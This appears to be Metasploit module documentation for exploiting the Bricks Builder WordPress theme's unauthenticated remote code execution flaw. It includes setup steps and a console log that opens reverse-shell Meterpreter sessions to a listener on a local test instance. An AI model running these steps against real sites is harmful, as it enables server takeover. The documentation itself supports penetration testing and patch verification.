Balgogan
6.0 KiB
6.0 KiB
Vulnerable Application
This Metasploit module exploits a Remote Code Execution vulnerability in Bricks Builder Theme, versions prior to 1.9.6. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval() function usage within the theme.
To replicate a vulnerable environment for testing:
- Install WordPress.
- Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6.
- Activate Bricks Builder.
- Create a model with a default page (to ensure the nonce is on index.php, add some elements).
Verification Steps
- Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6).
- Launch
msfconsolein your Metasploit framework. - Use the module:
use exploit/multi/http/wp_bricks_builder_rce. - Set
RHOSTSto the local IP address or hostname of the target. - Configure necessary options such as
TARGETURI,SSL, andRPORT. - Execute the exploit using the
runorexploitcommand. - If the target is vulnerable, the module will execute the specified payload.
Options
No option
Scenarios
Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8
Setup:
- Local WordPress instance with Bricks Builder Theme version 1.8.
- Metasploit Framework.
Steps:
- Start
msfconsole. - Load the module:
use exploit/multi/http/wp_bricks_builder_rce
- Set
RHOSTSto the local IP (e.g., 192.168.1.10). - Configure other necessary options (TARGETURI, SSL, etc.).
- Launch the exploit:
exploit
Expected Results:
- The module attempts to retrieve a nonce from the local server.
- It then uploads and executes the payload.
- If successful, control over the local WordPress instance is gained, depending on the payload used.
Example:
With cmd/linux/http/x64/meterpreter/reverse_tcp:
msf6 > search bricks
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_bricks_builder_rce 2024-02-19 excellent Yes Unauthenticated RCE in Bricks Builder Theme
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce
msf6 > use 0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > options
Module options (exploit/multi/http/wp_bricks_builder_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI path to WordPress
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME ilPaBylkCKr no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost
rhosts => localhost
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8888
rport => 8888
msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (3045380 bytes) to 172.20.0.2
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100
meterpreter > sysinfo
Computer : 172.20.0.2
OS : Debian 11.8 (Linux 6.4.10-060410-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
With php/meterpreter/reverse_tcp:
msf6 exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (39927 bytes) to 172.20.0.2
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100
meterpreter > sysinfo
Computer : 65e1e703e433
OS : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter >